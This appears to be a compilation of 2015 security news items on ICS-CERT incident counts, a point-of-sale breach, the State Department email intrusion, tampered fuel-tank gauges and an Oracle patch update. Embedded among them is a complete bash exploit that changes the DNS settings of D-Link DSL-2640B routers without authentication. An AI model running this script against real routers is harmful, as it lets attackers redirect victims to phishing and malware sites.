Dissecting the Linux/Moose malware (PDF): http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf Source
US industrial control systems were hit by cyber attacks at least 245 times over a 12-month period, the US Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) has revealed.

The figure was included in a report by the ICS-CERT, which operates within the National Cybersecurity and Integration Center, itself a part of the Department of Homeland Security. The report is classed as covering the 2014 fiscal year which, under US government dates, was between 1 October 2013 and 30 September 2014.

“ICS-CERT received and responded to 245 incidents reported by asset owners and industry partners,” the report said.

The energy sector accounted for the most incidents at 79, but perhaps the more alarming figure is that 65 incidents concerned cyber infiltration of the manufacturers of ICS hardware. “The ICS vendor community may be a target for sophisticated threat actors for a variety of reasons, including economic espionage and reconnaissance,” the report said.

The data below shows the various industries that ICS-CERT was called on to help.

The group said that 55 percent of investigated incidents showed signs that advanced persistent threats had been used to breach systems. “Other actor types included hacktivists, insider threats and criminals. In many cases, the threat actors were unknown due to a lack of attributional data,” it added.

The graph below shows the various forms of attack methods uncovered by the ICS-CERT, although worryingly the vast majority of attacks were untraceable.

The ICS-CERT did reveal, however, that some of its work related to hacks that used the Havex and Black Energy malware revealed during 2014. “ICS-CERT has provided onsite and remote assistance to various critical infrastructure companies to perform forensic analysis of their control systems and conduct a deep dive analysis into Havex and Black Energy malware,” it said.

The ICS-CERT also acknowledged that it is highly likely that it was unaware of other incidents that will have occurred during the period. “The 245 incidents are only what was reported to ICS-CERT, either by the asset owner or through relationships with trusted third-party agencies and researchers. Many more incidents occur in critical infrastructure that go unreported,” the report said.

The report comes amid rising concerns that industrial control systems are being targeted by Russian hackers, who are seen as new and highly sophisticated players in the cyber arena. Source
Michigan-based provider of point-of-sale devices, NEXTEP SYSTEMS, is investigating a possible security compromise of customer systems, according to a statement emailed to SCMagazine.com on Monday by Tommy Woycik, president of NEXTEP SYSTEMS. “NEXTEP was recently notified by law enforcement that the security of the systems at some of our customer locations may have been compromised,” according to the statement, which goes on to add, “We do know that this is NOT affecting all NEXTEP customers, and we have been working with our customers to ensure that any issues are addressed.” An investigation is ongoing with law enforcement and data security experts. On Monday, technology journalist Brian Krebs reported that financial industry sources identified a pattern of fraud on payment cards used recently at Zoup!, a restaurant chain and NEXTEP SYSTEMS customer. He wrote that Zoup! referred him to NEXTEP SYSTEMS. Source
[Chart: Top operating systems by vulnerabilities reported in 2014]
[Chart: Top applications by vulnerabilities reported in 2014]
[Chart: Most vulnerable operating systems and applications in 2014]
Email servers still compromised after THREE months

An attack against US State Department servers is still ongoing three months after the agency spotted miscreants inside its email system, it's reported.

In November the State Department was forced to suspend its unclassified email systems after it was successfully infiltrated by hackers unknown. At the time the agency said its classified emails were unaffected by the hack.

Now Bloomberg and the Wall Street Journal report multiple sources saying that the attack is still ongoing: the bad guys and girls still have remote access to internal computers. Every time sysadmins find and delete a malware infection, installed by the hackers, another variant pops up.

The point of failure was, we're told, a user clicking on a link to a dodgy website using an unpatched browser, leading to malicious remote-code execution. Once inside the network, the attackers spread out to the department's computers overseas, many of which now harbor malware.

Remote access to email inboxes has been disabled, it's reported. IT staff can't switch off the network to freeze the infection because the computer systems must remain operational for security reasons.

Five sources report that the attacks are Russian in origin, with one former US intelligence officer claiming that Putin’s online warriors are just as good as Uncle Sam's.

The secure email system is reportedly still safe, but unclassified emails can contain lots of juicy information – and hackers could masquerade as officials on the network to gain access to more sensitive documents. Messages regarding US policy on the Ukraine, and other files, have been swiped from the system, two sources report.

The difficulty in blocking further attacks raises worrying possibilities for the rest of the government’s IT managers. The State Department’s servers were compromised as part of a large-scale attack against US government systems, with the White House, the US Postal Service, and the National Weather Service all falling prey, albeit briefly.

“We deal successfully with thousands of attacks every day,” State Department spokeswoman Marie Harf told the Journal in a statement. “We take any possible cyber intrusion very seriously - as we did with the one we discussed several months ago — and we deal with them in conjunction with other relevant government agencies.”

Given the amount the US spends on information security these days it seems amazing that the NSA can’t rustle up a few of its hackers so adept at attacking and subverting legitimate means of communications and focus on defense for a change. Since 2001 the US has publicly spent over $500bn on its intelligence services, and documents leaked by Edward Snowden show the NSA and CIA spent over $25bn in 2013 alone. It doesn’t seem as though the American taxpayer is getting value for money. Source
```bash
#!/bin/bash
#
# D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
#
# Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# Different D-Link Routers are vulnerable to DNS change.
# The vulnerability exists in the web interface, which is
# accessible without authentication.
#
# Tested firmware version: EU_2.03
# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
# DEVICES OR FIRMWARE VERSIONS MAY BE AFFECTED.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
#   o Steering unknowing users to bad sites:
#     These sites can be phishing pages that
#     spoof well-known sites in order to
#     trick users into handing out sensitive
#     information.
#
#   o Replacing ads on legitimate sites:
#     Visiting certain sites can serve users
#     with infected systems a different set
#     of ads from those whose systems are
#     not infected.
#
#   o Controlling and redirecting network traffic:
#     Users of infected systems may not be granted
#     access to download important OS and software
#     updates from vendors like Microsoft and from
#     their respective security vendors.
#
#   o Pushing additional malware:
#     Infected systems are more prone to other
#     malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs are for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (data loss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#

if [[ $# -gt 3 || $# -lt 2 ]]; then
    echo " D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit"
    echo " ================================================================"
    echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
    echo " Example: $0 192.168.1.1 8.8.8.8"
    echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
    echo ""
    echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
    echo " http://www.ethical-hacker.org/"
    echo " https://www.facebook.com/ethicalhackerorg"
    exit;
fi

# The script relies on the GET command shipped with libwww-perl
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
    echo " Error : libwww-perl not found =/"
    exit;
fi

GET "http://$1/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" 0&> /dev/null <&1
```

Source
Hackers – possibly affiliated with Anonymous – have already attacked at least one internet-connected gas (petrol) station pump monitoring system.

Evidence of malfeasance, uncovered by Trend Micro, comes three weeks after research about automated tank gauge vulnerabilities from Rapid7, the firm behind Metasploit.

Automated tank gauges (ATGs) are used to monitor fuel tank inventory levels, track deliveries, raise alarms that indicate problems with the tank or gauge (such as a fuel spill). The technology can also be used to perform leak tests. ATGs are used by nearly every fuelling station in the United States and tens of thousands of systems internationally.

ATGs can typically be programmed and monitored through a built-in serial port, a plug-in serial port, a fax/modem, or a TCP/IP circuit board. In order to facilitate remote monitoring over the internet, ATG serial interfaces are often mapped to an internet-facing port. This opens the door to potential trouble, especially since serial interfaces are rarely password protected.

Rapid7 estimates that 5,800 ATGs are exposed to the internet without a password. Over 5,300 of these ATGs are located in the US. Put another way, around one in 30 of the 150,000 fuelling stations in the country are exposed to attack, leaving the door open to all sorts of mischief.

“An attacker with access to the serial port interface of an ATG may be able to shut down the station by spoofing the reported fuel level, generating false alarms, and locking the monitoring service out of the system,” Rapid7’s HD Moore warns. “Tank gauge malfunctions are considered a serious issue due to the regulatory and safety issues that may apply.”

But what’s actually happening at the pump? Independent researcher Stephen Hilt and Kyle Wilhoit, a senior threat researcher at Trend Micro, teamed up to investigate whether or not attackers were actively attempting to compromise these internet-facing gas pump monitoring systems.

In particular the duo looked at deployments of the Guardian AST Monitoring System, internet-ready kit designed to monitor inventory, pump levels, and assorted values of pumping systems typically found in gas stations.

Shodan, the well-known search engine for Internet-connected devices, and popular port-scanning tool Nmap create a ready mechanism for interested parties to hunt for inter-connected petrol pump kit. Hilt and Wilhoit discovered more than 1,515 vulnerable gas pump monitoring devices worldwide, less than a third of the figure logged by HD Moore last month.

That would be reason for cautious optimism – except that the duo also uncovered evidence of tampered Guardian AST devices. The US-located system, left wide open on the net, had been hacked, apparently by mischief-makers, referencing one of ragtag hacker group Anonymous’s favourite catch phrases.

An attacker had modified one of these pump-monitoring systems in the US. This pump system was found to be internet facing with no implemented security measures. The pump name was changed from “DIESEL” to “WE_ARE_LEGION.” The group Anonymous often uses the slogan “We Are Legion,” which might shed light on possible attributions of this attack. But given the nebulous nature of Anonymous, we can’t necessarily attribute this directly to the group.

An outage of these pump monitoring systems, while not catastrophic, could cause serious data loss and supply chain problems. For instance, should a volume value be misrepresented as low, a gasoline truck could be dispatched to investigate low tank values. Empty tank values could also be shown full, resulting in gas stations having no fuel.

The insecure gas pump monitoring system issue is part of the wider problem of insecure SCADA (industrial control) devices.

“Our investigation shows that the tampering of an internet-facing device resulted in a name change,” a blog post by Trend Micro on the research concludes. “But sooner or later, real world implications will occur, causing possible outages or even worse. Hopefully, with continued attention to these vulnerable systems, the security profile will change. Ideally, we will start seeing secure SCADA systems deployed, with no Internet facing devices.” Source
Oracle has released a critical patch update fixing 167 vulnerabilities across hundreds of its products, warning that the worst of them could be remotely exploited by hackers.

The pressing fixes involve several of Oracle's most widely used products and scored a full 10.0 rating on the CVSS 2.0 Base Score for vulnerabilities, the highest score available.

"The highest CVSS 2.0 Base Score for vulnerabilities in this critical patch update is 10.0 for Fujitsu M10-1 of Oracle Sun Systems Products Suite, Java SE of Oracle Java SE, M10-4 of Oracle Sun Systems Products Suite and M10-4S Servers of Oracle Sun Systems Products Suite," read the advisory. "Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply critical patch update fixes as soon as possible."

Oracle warned that the updates for Fujitsu M10-1 of Oracle Sun Systems Products Suite are particularly important. "This critical patch update contains 29 new security fixes for the Oracle Sun Systems Products Suite," the advisory said. "Ten of these vulnerabilities may be remotely exploitable without authentication [and] may be exploited over a network without the need for a username and password."

The Oracle Java SE update fixes 19 flaws, 14 of which were also remotely exploitable. The next most serious flaws relate to Oracle's Fusion Middleware, which received 35 security fixes. The worst carries a 9.3 rating and could also be remotely exploited.

The update follows reports that hackers are targeting enterprise companies with malware-laden patches purporting to come from Oracle.

The news comes during a period of heated debate about patching best practice. Microsoft announced plans on 9 January to stop offering non-paying customers advanced patch notifications. The announcement led to a backlash in the security community, many feeling that the move is a money-grabbing tactic by Microsoft.

Prior to the move, Microsoft came to blows with Google over the search firm's public disclosure of a Windows bug. Google Project Zero researchers publicly disclosed the bug in December 2014 having privately reported it to Microsoft in September. The move led to a debate about what constitutes responsible threat disclosure. Source